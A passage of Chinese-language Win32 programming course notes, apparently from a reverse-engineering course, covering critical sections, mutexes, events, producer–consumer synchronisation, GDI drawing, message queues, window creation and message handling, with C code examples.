20
hThread1 = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
21
22
CloseHandle(hThread);
23
24
getchar();
25
return 0;
26
}
27
滴水逆向课程笔记 – Win32
临界区 – 43
出现这样的问题其本质原因是什么呢?因为多线程在执行的时候是同步进行的,并不是按照顺序来,所以就都
会窒息,自然就会出现这种情况。
11.1.1 解决问题
想要解决线程安全问题,就需要引伸出一个概念:临界资源,临界资源表示对该资源的访问一次只能有一个线
程;访问临界资源的那一段程序,我们称之为临界区。
那么我们如何实现临界区呢?第一,我们可以自己来写,但是这需要一定门槛,先不过多的去了解;第二,可
以使用WIndows提供的API来实现。
11.2 实现临界区
首先会有一个令牌,假设线程1获取了这个令牌,那么这时候令牌则只为线程1所有,然后线程1会执行代码去
访问全局变量,最后归还令牌;如果其他线程想要去访问这个全局变量就需要获取这个令牌,但当令牌已经被
取走时则无法访问。
假设你自己来实现临界区,可能在判断令牌有没有被拿走的时候就又会出现问题,所以自己实现临界区还是有
一定的门槛的。
滴水逆向课程笔记 – Win32
临界区 – 44
1.
2.
3.
11.3 线程锁
线程锁就是临界区的实现方式,通过线程锁我们可以完美解决如上所述的问题,其步骤如下所示:
创建全局变量:CRITICAL_SECTION cs;
初始化全局变量:InitializeCriticalSection(&cs);
实现临界区:进入 → EnterCriticalSection(&cs); 离开 → LeaveCriticalSection(&cs);
我们就可以这样改写之前的售卖物品的代码:
在使用全局变量开始前构建并进入临界区,使用完之后离开临界区:
滴水逆向课程笔记 – Win32
临界区 – 45
#include <windows.h>
1
2
CRITICAL_SECTION cs; // 创建全局变量
3
int countNumber = 10;
4
5
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
6
while (1) {
7
EnterCriticalSection(&cs); // 构建临界区,获取令牌
8
if (countNumber > 0) {
9
printf("Thread: %d\n", *((int*)lpParameter));
10
printf("Sell num: %d\n", countNumber);
11
// 售出-1
12
countNumber--;
13
printf("Count: %d\n", countNumber);
14
} else {
15
LeaveCriticalSection(&cs); // 离开临临界区,归还令牌
16
break;
17
}
18
LeaveCriticalSection(&cs); // 离开临临界区,归还令牌
19
}
20
21
return 0;
22
}
23
24
int main(int argc, char* argv[])
25
{
26
27
InitializeCriticalSection(&cs); // 使用之前进行初始化
28
29
int a = 1;
30
HANDLE hThread;
31
hThread = CreateThread(NULL, NULL, ThreadProc, (LPVOID)&a, 0, NULL);
32
33
int b = 2;
34
HANDLE hThread1;
35
hThread1 = CreateThread(NULL, NULL, ThreadProc, (LPVOID)&b, 0, NULL);
36
37
CloseHandle(hThread);
38
39
getchar();
40
return 0;
41
}
42
滴水逆向课程笔记 – Win32
临界区 – 46
滴水逆向课程笔记 – Win32
互斥体 – 47
12 互斥体
12.1 内核级临界资源怎么办?
上一章中我们了解了使用线程锁来解决多个线程共用一个全局变量的线程安全问题;那么假设A进程的B线程和
C进程的D线程,同时使用的是内核级的临界资源(内核对象:线程、文件、进程...)该怎么让这个访问是安全
的?使用线程锁的方式明显不行,因为线程锁仅能控制同进程中的多线程。
那么这时候我们就需要一个能够放在内核中的令牌来控制,而实现这个作用的,我们称之为互斥体。
12.1.1 互斥体的使用
创建互斥体的函数为CreateMutex,该函数的语法格式如下:
我们可以模拟一下操作资源然后创建:
HANDLE CreateMutex(
1
LPSECURITY_ATTRIBUTES lpMutexAttributes, // SD 安全属性,包含安全描述符
2
BOOL bInitialOwner, // initial owner 是否希望互斥体创建出来就有信号,或者说就可以
使用,如果希望的话就为FALSE;官方解释为如果该值为TRUE则表示当前进程拥有该互斥体所有权
3
LPCTSTR lpName // object name 互斥体的名字
4
);
5
滴水逆向课程笔记 – Win32
互斥体 – 48
我们可以运行两个进程来看一下互斥体的作用:
#include <windows.h>
1
2
int main(int argc, char* argv[])
3
{
4
// 创建互斥体
5
HANDLE cm = CreateMutex(NULL, FALSE, "XYZ");
6
// 等待互斥体状态发生变化,也就是有信号或为互斥体拥有者,获取令牌
7
WaitForSingleObject(cm, INFINITE);
8
9
// 操作资源
10
for (int i = 0; i < 5; i++) {
11
printf("Process: A Thread: B -- %d \n", i);
12
Sleep(1000);
13
}
14
// 释放令牌
15
ReleaseMutex(cm);
16
return 0;
17
}
18
滴水逆向课程笔记 – Win32
互斥体 – 49
1.
2.
3.
4.
12.2 互斥体和线程锁的区别
线程锁只能用于单个进程间的线程控制
互斥体可以设定等待超时,但线程锁不能
线程意外结束时,互斥体可以避免无限等待
互斥体效率没有线程锁高
12.3 课外扩展-互斥体防止程序多开
CreateMutex函数的返回值MSDN Library的介绍是这样的:如果函数成功,返回值是一个指向mutex对象的句
柄;如果命名的mutex对象在函数调用前已经存在,函数返回现有对象的句柄,GetLastError返回
ERROR_ALREADY_EXISTS(表示互斥体以及存在);否则,调用者创建该mutex对象;如果函数失败,返回值
为NULL,要获得扩展的错误信息,请调用GetLastError获取。
滴水逆向课程笔记 – Win32
互斥体 – 50
所以我们可以利用互斥体来防止程序进行多开:
#include <windows.h>
1
2
int main(int argc, char* argv[])
3
{
4
// 创建互斥体
5
HANDLE cm = CreateMutex(NULL, TRUE, "XYZ");
6
// 判断互斥体是否创建失败
7
if (cm != NULL) {
8
// 判断互斥体是否已经存在,如果存在则表示程序被多次打开
9
if (GetLastError() == ERROR_ALREADY_EXISTS) {
10
printf("该程序已经开启了,请勿再次开启!");
11
getchar();
12
} else {
13
// 等待互斥体状态发生变化,也就是有信号或为互斥体拥有者,获取令牌
14
WaitForSingleObject(cm, INFINITE);
15
// 操作资源
16
for (int i = 0; i < 5; i++) {
17
printf("Process: A Thread: B -- %d \n", i);
18
Sleep(1000);
19
}
20
// 释放令牌
21
ReleaseMutex(cm);
22
}
23
} else {
24
printf("CreateMutex 创建失败! 错误代码: %d\n", GetLastError());
25
}
26
27
return 0;
28
}
29
滴水逆向课程笔记 – Win32
事件 – 51
13 事件
事件本身也是一种内核对象,其也是是用来控制线程的。
13.1 通知类型
事件本身可以做为通知类型来使用,创建事件使用函数CreateEvent,其语法格式如下:
那么通知类型到底是什么?我们可以写一段代码来看一下:
HANDLE CreateEvent(
1
LPSECURITY_ATTRIBUTES lpEventAttributes, // SD 安全属性,包含安全描述符
2
BOOL bManualReset, // reset type 如果你希望当前事件类型是通知类型则写TRUE,反之
FALSE
3
BOOL bInitialState, // initial state 初始状态,决定创建出来时候是否有信号,有为
TRUE,没有为FALSE
4
LPCTSTR lpName // object name 事件名字
5
);
6
滴水逆向课程笔记 – Win32
事件 – 52
如下图所示,我们运行了代码,会发现两个线程都执行了,而如果是之前我们使用互斥体的话则线程A先执行
然后线程B等待线程A归还令牌(执行结束)才会执行,这里我们在线程函数的最后使用了getchar()阻止了线程
执行结束,但是两个线程还是都执行了:
#include <windows.h>
1
2
HANDLE e_event;
3
4
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
5
// 等待事件
6
WaitForSingleObject(e_event, INFINITE);
7
printf("ThreadProc - running ...\n");
8
getchar();
9
return 0;
10
}
11
12
DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
13
// 等待事件
14
WaitForSingleObject(e_event, INFINITE);
15
printf("ThreadProcB - running ...\n");
16
getchar();
17
return 0;
18
}
19
20
int main(int argc, char* argv[])
21
{
22
23
// 创建事件
24
// 第二个参数,FALSE表示非通知类型通知,也就是互斥;TRUE则表示为通知类型
25
// 第三个参数表示初始状态没有信号
26
e_event = CreateEvent(NULL, TRUE, FALSE, NULL);
27
28
// 创建2个线程
29
HANDLE hThread[2];
30
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
31
hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);
32
33
// 设置事件为已通知,也就是设置为有信号
34
SetEvent(e_event);
35
36
// 等待线程执行结束,销毁内核对象
37
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
38
CloseHandle(hThread[0]);
39
CloseHandle(hThread[1]);
40
// 事件类型也是内核对象,所以也需要关闭句柄
41
CloseHandle(e_event);
42
43
return 0;
44
}
45
滴水逆向课程笔记 – Win32
事件 – 53
我们修改下创建事件函数的参数为互斥,来看一下,那么互斥和通知类型的区别一下就很明显的展示出来了:
滴水逆向课程笔记 – Win32
事件 – 54
那么通知类型实现的原理是什么呢?实际上这个跟WaitForSingleObject函数有关,我们可以看下MSDN Library
对该函数的介绍:
可以很清晰的看见最后说到,该函数会修改内核对象的状态,所以通知类型的原理就很简单了,就是当事件对
象为通知类型时该函数就不会去修改对象的状态,这个状态我们可以理解成是占用,当WaitForSingleObject函
数判断为非占用时就修改内核对象的状态为占用然后向下执行,而其他线程想使用就需要等待,这就是互斥的
概念。
13.2 线程同步
线程互斥:线程互斥是指对于共享的进程系统资源,在各单个线程访问时的排它性;当有若干个线程都要使用
某一共享资源时,任何时刻最多只允许一个线程去使用,其它要使用该资源的线程必须等待,直到占用资源者
释放该资源。
线程同步: 线程同步是指线程之间所具有的一种制约关系,一个线程的执行依赖另一个线程的消息,当它没
有得到另一个线程的消息时应等待,直到消息到达时才被唤醒;同步的前提是互斥,其次就是有序,互斥并不
代表A线程访问临界资源后就一定是B线程再去访问,也有可能是A线程,这就是属于无序的状态,所以同步就
是互斥加上有序。
滴水逆向课程笔记 – Win32
事件 – 55
13.2.1 生产者与消费者
想要证明事件和互斥体最本质的区别,我们可以使用生产者与消费者模型来举例子,那么这个模型是什么意思
呢?
我们就可以理解为生产者生产一个物品,将其放进容器里,然后消费者从容器中取物品进行消费,就这样“按
部就班”下去...
互斥体
首先我们来写一段互斥体下的生产者与消费者的代码:
生产者消费者模式就是通过一个容器来解决生产者和消费者的强耦合(依赖性)问题。生产者和消费
者彼此之间不直接通讯,而通过阻塞队列来进行通讯,所以生产者生产完数据之后不用等待消费者处
理,直接扔给阻塞队列,消费者不找生产者要数据,而是直接从阻塞队列里取,阻塞队列就相当于一
个缓冲区,平衡了生产者和消费者的处理能力。
滴水逆向课程笔记 – Win32
事件 – 56
#include "stdafx.h"
1
#include <windows.h>
2
3
// 容器
4
int container;
5
6
// 次数
7
int count = 10;
8
9
// 互斥体
10
HANDLE hMutex;
11
12
// 生产者
13
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
14
for (int i = 0; i < count; i++) {
15
// 等待互斥体,获取令牌
16
WaitForSingleObject(hMutex, INFINITE);
17
// 获取当前进程ID
18
int threadId = GetCurrentThreadId();
19
// 生产存放进容器
20
container = 1;
21
printf("Thread: %d, Build: %d \n", threadId, container);
22
// 释放令牌
23
ReleaseMutex(hMutex);
24
}
25
return 0;
26
}
27
28
// 消费者
29
DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
30
for (int i = 0; i < count; i++) {
31
// 等待互斥体,获取令牌
32
WaitForSingleObject(hMutex, INFINITE);
33
// 获取当前进程ID
34
int threadId = GetCurrentThreadId();
35
printf("Thread: %d, Consume: %d \n", threadId, container);
36
// 消费
37
container = 0;
38
// 释放令牌
39
ReleaseMutex(hMutex);
40
}
41
return 0;
42
}
43
44
int main(int argc, char* argv[])
45
{
46
// 创建互斥体
47
hMutex = CreateMutex(NULL, FALSE, NULL);
48
49
// 创建2个线程
50
HANDLE hThread[2];
51
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
52
hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);
53
54
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
55
滴水逆向课程笔记 – Win32
事件 – 57
运行结果如下图所示:
我们可以清晰的看见结果并不是我们想要的,生产一次消费一次的有序进行,甚至还出现了先消费后生产的情
况,这个问题我们可以去修改代码解决:
CloseHandle(hThread[0]);
56
CloseHandle(hThread[1]);
57
CloseHandle(hMutex);
58
59
return 0;
60
}
61
滴水逆向课程笔记 – Win32
事件 – 58
这样虽然看似解决了问题,但是实际上也同样会出现一种问题,那就是for循环执行了不止10次,这样会倒是过
分的占用计算资源。
事件
我们使用事件的方式就可以更加完美的解决这一需求:
滴水逆向课程笔记 – Win32
事件 – 59
#include <windows.h>
1
2
// 容器
3
int container = 0;
4
5
// 次数
6
int count = 10;
7
8
// 事件
9
HANDLE eventA;
10
HANDLE eventB;
11
12
// 生产者
13
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
14
for (int i = 0; i < count; i++) {
15
// 等待事件,修改事件A状态
16
WaitForSingleObject(eventA, INFINITE);
17
// 获取当前进程ID
18
int threadId = GetCurrentThreadId();
19
// 生产存放进容器
20
container = 1;
21
printf("Thread: %d, Build: %d \n", threadId, container);
22
// 给eventB设置信号
23
SetEvent(eventB);
24
}
25
return 0;
26
}
27
28
// 消费者
29
DWORD WINAPI ThreadProcB(LPVOID lpParameter) {
30
for (int i = 0; i < count; i++) {
31
// 等待事件,修改事件B状态
32
WaitForSingleObject(eventB, INFINITE);
33
// 获取当前进程ID
34
int threadId = GetCurrentThreadId();
35
printf("Thread: %d, Consume: %d \n", threadId, container);
36
// 消费
37
container = 0;
38
// 给eventA设置信号
39
SetEvent(eventA);
40
}
41
return 0;
42
}
43
44
int main(int argc, char* argv[])
45
{
46
// 创建事件
47
// 线程同步的前提是互斥
48
// 顺序按照先生产后消费,所以事件A设置信号,事件B需要通过生产者线程来设置信号
49
eventA = CreateEvent(NULL, FALSE, TRUE, NULL);
50
eventB = CreateEvent(NULL, FALSE, FALSE, NULL);
51
52
// 创建2个线程
53
HANDLE hThread[2];
54
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
55
滴水逆向课程笔记 – Win32
事件 – 60
运行结果如下图:
hThread[1] = CreateThread(NULL, NULL, ThreadProcB, NULL, 0, NULL);
56
57
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
58
CloseHandle(hThread[0]);
59
CloseHandle(hThread[1]);
60
// 事件类型也是内核对象,所以也需要关闭句柄
61
CloseHandle(eventA);
62
CloseHandle(eventB);
63
64
return 0;
65
}
66
滴水逆向课程笔记 – Win32
窗口的本质 – 61
1.
2.
3.
14 窗口的本质
之前我们学习写的程序都是基于控制台的,而从本章开始学习图形化界面相关的知识。
之前我们所学习的进程、线程之类的函数,其接口来源于kernel32.dll → ntoskrnl.exe;而我们要学习的图形化
界面的接口,它就来源于user32.dll、gdi32.dll → win32k.sys。
user32.dll和gdi32.dll的区别在哪呢?前者是你想使用Windows已经画好的界面就用它,我们称之为GUI编程;
后者是你想自己画一个界面,例如你要画一朵花,那么就使用后者,因为这涉及到绘图相关的内容,我们称之
为GDI编程。
之前我们了解过HANDLE句柄,其都是私有的,而在图形界面中有一个新的句柄,其叫HWND,win32k.sys提供
在内核层创建图形化界面,我们想要在应用层调用就需要对应的句柄HWND,而这个句柄表是全局的,并且只
有一个。
14.1 GDI - 图形设备接口
GDI是Graphics Device Interface的缩写,其中文为图形设备接口。
本章主要是学习如何进行GDI编程,但是我们在日常的工作中是不需要用到的,并且没有什么实际意义(需要
的都有现成的),我们学习它就是为了来了解窗口的本质、消息机制的本质。
关于GDI有这么几个概念:
设备对象:画的位置
DC(Device Contexts):设备上下文对象(内存)
图像(图形)对象:决定你要画的东西的属性
滴水逆向课程笔记 – Win32
窗口的本质 – 62
14.2 进行简单的绘画
如下代码就是在桌面中进行绘画,具体代码意思都在注释中了,不了解的可以在MSDN Library中查询:
滴水逆向课程笔记 – Win32
窗口的本质 – 63
#include <windows.h>
1
2
int main(int argc, char* argv[])
3
{
4
HWND hWnd; // 窗口句柄
5
HDC hDc; // 设备上下文对象
6
HPEN hPen; // 画笔
7
// 1. 设备对象,要绘画的位置
8
// 设置为NULL则表示在桌面中绘画
9
hWnd = (HWND)NULL;
10
11
// 2. 获取设备的上下文对象(DC)
12
/*
13
语法格式:
14
HDC GetDC(
15
HWND hWnd // handle to window
16
);
17
*/
18
hDc = GetDC(hWnd);
19
20
// 3. 创建画笔,设置线条的属性
21
/*
22
语法格式:
23
HPEN CreatePen(
24
int fnPenStyle, // pen style
25
int nWidth, // pen width
26
COLORREF crColor // pen color
27
);
28
*/
29
hPen = CreatePen(PS_SOLID, 5, RGB(0xFF,00,00)); // RGB表示红绿蓝,红绿蓝的组合就可以组成新的一种颜色。
30
31
// 4. 关联
32
/*
33
语法格式:
34
HGDIOBJ SelectObject(
35
HDC hdc, // handle to DC
36
HGDIOBJ hgdiobj // handle to object
37
);
38
*/
39
SelectObject(hDc, hPen);
40
41
// 5. 开始画线
42
/*
43
语法格式:
44
BOOL LineTo(
45
HDC hdc, // device context handle
46
int nXEnd, // x-coordinate of ending point
47
int nYEnd // y-coordinate of ending point
48
);
49
*/
50
LineTo(hDc, 400, 400);
51
52
// 6. 释放资源
53
DeleteObject(hPen);
54
ReleaseDC(hWnd, hDc);
55
滴水逆向课程笔记 – Win32
窗口的本质 – 64
56
return 0;
57
}
58
滴水逆向课程笔记 – Win32
消息队列 – 65
15 消息队列
15.1 什么是消息
当我们点击鼠标的时候,或者当我们按下键盘的时候,操作系统都要把这些动作记录下来,存储到一个结构体
中,这个结构体就是消息。
15.2 消息队列
每个线程只有一个消息队列。
15.3 窗口与线程
当我们把鼠标点击左边窗口关闭按钮,为什么它会关闭,这个关闭(坐标、左右键...)操作系统会封装到结构
体里(消息),那么这个消息如何精确的传递给对应进程的线程呢?
滴水逆向课程笔记 – Win32
消息队列 – 66
那是因为操作系统可以将坐标之类的作为索引,去找到对应的窗口,窗口在内核中是有窗口对象的,而这个窗
口对象就会包含一个成员,这个成员就是线程对象的指针,线程又包含了消息,所以这样一个顺序就很容易理
解了。
注意:一个线程可以有多个窗口,但是一个窗口只属于一个线程。
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 67
16 第一个Windwos程序
16.1 新建Windows窗口程序项目
VC6新建工程,选择Win32 Application,下一步选择一个简单的Win32的程序。
控制台程序是从Main函数为入口开始执行的,而Win32窗口程序是从WinMain函数开始执行的。
新建的项目里的头文件已经把需要用到的Windows.h头文件包含了:
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 68
1.
2.
3.
16.2 WinMain函数
WinMain函数作为Win32窗口程序的入口函数,我们需要了解一下其函数的参数,语法格式如下:
参数解释:
HINSTANCE hInstance,这是一个句柄,在Win32中H开头的通常都是句柄,这里的HINSTANCE是指向模
块的句柄,实际上这个值就是模块在进程空间内的内存地址;
HINSTANCE hPrevInstance,该参数永远为空NULL,无需理解;
第三、第四个参数(LPSTR lpCmdLine、int nCmdShow)是由CreateProcess的LPTSTR lpCommandLine、
LPSTARTUPINFO lpStartupInfo参数传递的。
16.3 调试信息输出
我们在窗口程序中想要输出信息就不可以使用printf了,我们可以使用另外一个函数OutputDebugString,其语
法格式如下:
int WINAPI WinMain(
1
HINSTANCE hInstance, // handle to current instance
2
HINSTANCE hPrevInstance, // handle to previous instance
3
LPSTR lpCmdLine, // command line
4
int nCmdShow // show state
5
);
6
void OutputDebugString(
1
LPCTSTR lpOutputString
2
);
3
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 69
传参就是一个LPCTSTR类型(字符串),但是需要注意的是这个函数只能打印固定字符串,不能打印格式化的
字符串,所以如果需要格式化输出,需要在这之前使用sprintf函数进行格式化(自行查阅),这里我们可以尝
试输出当前模块的句柄:
运行该代码就会在Debug输出框中发现打印的字符串,这就是一个内存地址:
#include "stdafx.h"
1
2
int APIENTRY WinMain(HINSTANCE hInstance,
3
HINSTANCE hPrevInstance,
4
LPSTR lpCmdLine,
5
int nCmdShow)
6
{
7
// TODO: Place code here.
8
DWORD dwAddr = (DWORD)hInstance;
9
10
char szOutBuff[0x80];
11
sprintf(szOutBuff, "hInstance address: %x \n", dwAddr); // 该函数需要包含stdio.h头文件
12
OutputDebugString(szOutBuff);
13
14
return 0;
15
}
16
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 70
16.4 创建窗口程序
如下代码创建了一个简单的窗口程序:
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 71
// Windows.cpp : Defines the entry point for the application.
1
//
2
3
#include "stdafx.h"
4
5
// 窗口函数定义
6
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
7
// 必须要调用一个默认的消息处理函数,关闭、最小化、最大化都是由默认消息处理函数处理的
8
return DefWindowProc(hwnd, uMsg, wParam, lParam);
9
}
10
11
int APIENTRY WinMain(HINSTANCE hInstance,
12
HINSTANCE hPrevInstance,
13
LPSTR lpCmdLine,
14
int nCmdShow)
15
{
16
char szOutBuff[0x80];
17
18
// 1. 定义创建的窗口(创建注册窗口类)
19
TCHAR className[] = TEXT("My First Window");
20
WNDCLASS wndClass = {0};
21
// 设置窗口背景色
22
wndClass.hbrBackground = (HBRUSH)COLOR_BACKGROUND;
23
// 设置类名字
24
wndClass.lpszClassName = className;
25
// 设置模块地址
26
wndClass.hInstance = hInstance;
27
// 处理消息的窗口函数
28
wndClass.lpfnWndProc = WindowProc; // 不是调用函数,只是告诉操作系统,当前窗口对应的窗口回调函数是什么
29
// 注册窗口类
30
RegisterClass(&wndClass);
31
32
// 2. 创建并显示窗口
33
// 创建窗口
34
/*
35
CreateWindow 语法格式:
36
HWND CreateWindow(
37
LPCTSTR lpClassName, // registered class name 类名字
38
LPCTSTR lpWindowName, // window name 窗口名字
39
DWORD dwStyle, // window style 窗口外观的样式
40
int x, // horizontal position of window 相对于父窗口x坐标
41
int y, // vertical position of window 相对于父窗口y坐标
42
int nWidth, // window width 窗口宽度:像素
43
int nHeight, // window height 窗口长度:像素
44
HWND hWndParent, // handle to parent or owner window 父窗口句柄
45
HMENU hMenu, // menu handle or child identifier 菜单句柄
46
HINSTANCE hInstance, // handle to application instance 模块
47
LPVOID lpParam // window-creation data 附加数据
48
);
49
*/
50
HWND hWnd = CreateWindow(className, TEXT("窗口"), WS_OVERLAPPEDWINDOW, 10, 10, 600, 300, NULL,
NULL, hInstance, NULL);
51
52
if (hWnd == NULL) {
53
// 如果为NULL则窗口创建失败,输出错误信息
54
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 72
如下图是窗口程序创建执行流程:
sprintf(szOutBuff, "Error: %d", GetLastError());
55
OutputDebugString(szOutBuff);
56
return 0;
57
}
58
59
// 显示窗口
60
/*
61
ShowWindow 语法格式:
62
BOOL ShowWindow(
63
HWND hWnd, // handle to window 窗口句柄
64
int nCmdShow // show state 显示的形式
65
);
66
*/
67
ShowWindow(hWnd, SW_SHOW);
68
69
// 3. 接收消息并处理
70
/*
71
GetMessage 语法格式:
72
BOOL GetMessage(
73
LPMSG lpMsg, // message information OUT类型参数,这是一个指针
74
// 后三个参数都是过滤条件
75
HWND hWnd, // handle to window 窗口句柄,如果为NULL则表示该线程中的所有消息都要
76
UINT wMsgFilterMin, // first message 第一条信息
77
UINT wMsgFilterMax // last message 最后一条信息
78
);
79
*/
80
MSG msg;
81
BOOL bRet;
82
while( (bRet = GetMessage( &msg, NULL, 0, 0 )) != 0)
83
{
84
if (bRet == -1)
85
{
86
// handle the error and possibly exit
87
sprintf(szOutBuff, "Error: %d", GetLastError());
88
OutputDebugString(szOutBuff);
89
return 0;
90
}
91
else
92
{
93
// 转换消息
94
TranslateMessage(&msg);
95
// 分发消息:就是给系统调用窗口处理函数
96
DispatchMessage(&msg);
97
}
98
}
99
100
return 0;
101
}
102
滴水逆向课程笔记 – Win32
第一个Windwos程序 – 73
滴水逆向课程笔记 – Win32
消息类型 – 74
17 消息类型
17.1 消息的产生与处理流程
消息的产生与处理流程,从消息发起这个点开始说,假设我们点击了某个窗口时就会产生一个消息,操作系统
得到这个消息后先判断当前点击的是哪个窗口,找到对应的窗口对象,再根据窗口对象的里的某一个成员找到
对应线程,一旦找到了对应线程,操作系统就会把封装好的消息(这是一个结构体,包含了你鼠标点击的坐标
等等消息)存到对应的消息队列里,应用程序就会通过GetMessage不停的从消息队列中取消息。
17.2 消息结构体
我们是通过GetMessage函数接收消息的,其第一个参数就是接收的消息(结构体),所以可以在之前的代码中
选中MSG然后F12跟进看一下消息结构体的定义:
滴水逆向课程笔记 – Win32
消息类型 – 75
能产生消息的情况有四种情况:1. 键盘 2. 鼠标 3. 其他应用程序 4. 操作系统内核程序,有这么多消息要处理,
所以操作系统会将所有消息区分类别,每个消息都有独一无二的编号。
消息这个结构体存储的信息也不多,只能知道消息属于哪个窗口,根本不知道对应窗口函数是什么,所以我们
不得不在之后对消息进行分发(DispatchMessage函数),而后由内核发起调用来执行窗口函数。
换而言之,我们这个消息的结构体实际上就是传递给了窗口函数,其四个参数对应着消息结构体的前四个成员
。
17.3 消息类型
我们想要关注自己想要关注的消息类型,首先可以在窗口函数中打印消息类型来看看都有什么消息类型:
typedef struct tagMSG {
1
HWND hwnd; // 所属窗口句柄
2
UINT message; // 消息类型:编号
3
WPARAM wParam; // 附加数据,进一步描述消息的
4
LPARAM lParam; // 附加数据,进一步描述消息的
5
DWORD time; // 消息产生的时间
6
POINT pt; // 在哪里产生的
7
} MSG, *PMSG;
8
滴水逆向课程笔记 – Win32
消息类型 – 76
可以看见这边输出了一个0x1,想要知道这个对应着什么,我们可以在C:\Program Files\Microsoft Visual
Studio\VC98\Include目录中找到WINUSER.H这个文件来查看,搜索0x0001就可以找到:
// 窗口函数定义
1
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
2
char szOutBuff[0x80];
3
sprintf(szOutBuff, "Message: %x - %x \n", hwnd, uMsg);
4
OutputDebugString(szOutBuff);
5
6
// 必须要调用一个默认的消息处理函数,关闭、最小化、最大化都是由默认消息处理函数处理的
7
return DefWindowProc(hwnd, uMsg, wParam, lParam);
8
}
9
滴水逆向课程笔记 – Win32
消息类型 – 77
那么我们可以看见对应的宏就是WM_CREATE,这个消息的意思就是窗口创建,所以我们有很多消息是不需要
关注的,而且消息时刻都在产生,非常非常多。
17.3.1 处理窗口关闭
在窗口关闭时,实际上进程并不会关闭,所以我们需要在窗口函数中筛选条件,当窗口关闭了就退出进程。
17.3.2 处理键盘按下
我们除了可以处理窗口关闭,处理键盘按下也是没问题的,键盘按下的宏是WM_KEYDOWN,但是我们想要按
下a这个键之后才处理该怎么办?首先我们需要查阅一下MSDN Library:
// 窗口函数定义
1
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
2
switch(uMsg) {
3
// 当窗口关闭则退出进程
4
case WM_DESTROY:
5
{
6
PostQuitMessage(0);
7
break;
8
}
9
}
10
11
// 必须要调用一个默认的消息处理函数,关闭、最小化、最大化都是由默认消息处理函数处理的
12
return DefWindowProc(hwnd, uMsg, wParam, lParam);
13
}
14
滴水逆向课程笔记 – Win32
消息类型 – 78
可以很清楚的看见窗口函数的第三个参数就是虚拟键码(键盘上每个键都对应一个虚拟键码),我们可以输出
下按下a,其对应虚拟键码是什么:
LRESULT CALLBACK WindowProc(
1
HWND hwnd, // handle to window
2
UINT uMsg, // WM_KEYDOWN
3
WPARAM wParam, // virtual-key code
4
LPARAM lParam // key data
5
);
6
// 窗口函数定义
1
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
2
switch(uMsg) {
3
// 当键盘按下则处理
4
case WM_KEYDOWN:
5
{
6
char szOutBuff[0x80];
7
sprintf(szOutBuff, "keycode: %x \n", wParam);
8
OutputDebugString(szOutBuff);
9
break;
10
}
11
}
12
13
// 必须要调用一个默认的消息处理函数,关闭、最小化、最大化都是由默认消息处理函数处理的
14
return DefWindowProc(hwnd, uMsg, wParam, lParam);
15
}
16
滴水逆向课程笔记 – Win32
消息类型 – 79
如上图所示,按下a之后输出的虚拟键码是0x41,所以我们可以根据这个来进行判断。
17.4 转换消息
之前我们举例可以处理键盘按下的消息,但是我们想要直观的看到底输入了什么而不是虚拟键码该怎么办?这
时候我们就需要使用WM_CHAR这个宏了,但是在这之前,我们的消息是必须要经过转换的,只有其转换了,
我们的虚拟键码才能变成具体的字符。
WM_CHAR宏对应的窗口函数参数作用如下:
第三个参数就是字符所以我们直接输出这个即可:
LRESULT CALLBACK WindowProc(
1
HWND hwnd, // handle to window
2
UINT uMsg, // WM_CHAR
3
WPARAM wParam, // character code (TCHAR)
4
LPARAM lParam // key data
5
);
6
滴水逆向课程笔记 – Win32
消息类型 – 80
滴水逆向课程笔记 – Win32
子窗口控件 – 81
1.
2.
3.
18 子窗口控件
18.1 关于子窗口控件
Windows提供了几个预定义的窗口类以方便我们的使用,我们一般叫它们为子窗口控件,简称控件;
控件会自己处理消息,并在自己状态发生改变时通知父窗口;
预定义的控件有:按钮、复选框、编辑框、静态字符串标签和滚动条等。
18.2 创建编辑框和按钮
我们想使用子窗口控件可以使用CreateWindow函数来创建,创建位置我们可以选在窗口函数中,当窗口创建则
开始创建子窗口控件。
滴水逆向课程笔记 – Win32
子窗口控件 – 82
// Windows.cpp : Defines the entry point for the application.
1
//
2
3
#include "stdafx.h"
4
// 定义子窗口标识
5
#define CWA_EDIT 0x100
6
#define CWA_BUTTON_0 0x101
7
#define CWA_BUTTON_1 0x102
8
9
// 定义全局模块
10
HINSTANCE gHinstance;
11
12
13
// 窗口函数定义
14
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
15
switch (uMsg) {
16
// 当键盘按下则处理
17
case WM_CHAR:
18
{
19
char szOutBuff[0x80];
20
sprintf(szOutBuff, "keycode: %c \n", wParam);
21
OutputDebugString(szOutBuff);
22
break;
23
}
24
// 当窗口创建则开始创建子窗口控件
25
case WM_CREATE:
26
{
27
// 创建编辑框
28
CreateWindow(
29
TEXT("EDIT"), // registered class name 注册的类名,使用EDIT则为编辑框
30
TEXT(""), // window name 窗口名称
31
WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_MULTILINE, // window style 子窗口控
件样式:子窗口、创建后可以看到、滚动条、自动换行
32
